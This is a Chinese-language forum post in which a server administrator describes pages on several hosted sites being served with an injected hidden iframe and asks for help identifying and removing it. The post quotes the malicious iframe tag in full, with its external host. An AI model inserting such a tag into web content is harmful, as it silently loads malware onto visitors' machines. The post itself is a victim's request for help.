服务器遭遇病毒，请各位大侠帮忙看看，5555555555！今天凌晨正在生成静态页面，突然杀毒软件报病毒，感觉不对，打开一个新的窗口，点击一个刚刚生成的静态页面，杀毒软件马上报有病毒，人都吓傻了。马上查询网页原文件，发现网页源代码的头部被人挂了一个病毒，原来的代码是“<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
”被人在前面加了一行代码为“<iframe src=http://123s123.cn/admin/95.htm width=20 height=0 frameborder=0></iframe>”，开始以为是后台的静态模板被人修改了，所以导致生成的页面都包含这个病毒地址，但后来发现就算是访问不使用模板的后台登录页面都会提示有病毒，同样尝试了同一台服务器上面的其他两个虚拟站点，也提示有这个病毒，马上直接用FTP下载刚才提示有病毒的静态网页文件，然后查看源代码，显示并没有那行病毒代码，到此感觉这行代码应该是动态插入到网页中去的，不是静态生成的。

马上登录服务器，然后用杀毒软件（Mcafee v8.5 企业版本 + 11.14日的病毒库）全盘查毒，一边查毒，一边查看IIS的设置，没有发现异常，以为是IIS被感染了。所以导致所有虚拟站点访问时都提示有病毒，然后马上卸载了IIS，然后重新安装后重新访问网页，还是提示有病毒。。。。。

这时候实在没办法了。就对C盘的所有文件全盘查找含有“123s123.cn”此网址的文件，结果还是没有找到。。。。。

我的服务器的远程管理都是加上IP限制的，对方怎么进入的呢？5555555555！哭了。55555555555555555，这到底是怎么回事啊？？各位大侠帮帮我看看吧。这到底是什么病毒？应该怎么清除啊？

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; MAXTHON 2.0)